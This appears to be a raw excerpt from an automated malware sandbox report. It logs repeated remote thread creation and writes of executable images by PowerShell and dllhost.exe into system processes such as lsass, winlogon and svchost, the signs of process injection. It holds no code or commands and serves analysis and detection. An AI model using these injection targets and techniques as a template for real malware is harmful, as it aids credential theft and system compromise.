Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 199D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B82EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AB72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B4B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\spoolsv.exe EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3142EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 78742EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B8D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D0A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13EF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 644F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5DA72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 199D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B82EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 52342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9DA92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B4B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3142EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 78742EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D0A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 644F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 52342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9DAC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E77D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A4BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5C652EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3FB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A4E32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E77D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A4BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7A022EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5C652EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 72DC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3FB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2942EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A4E32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7A022EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A5ED2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 72DC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2942EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A5ED2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 21E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 21E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 21225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 21B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2BC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2BE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 20525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 20725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A6B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B0A02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DFF92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27325AC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAF190000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEE30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
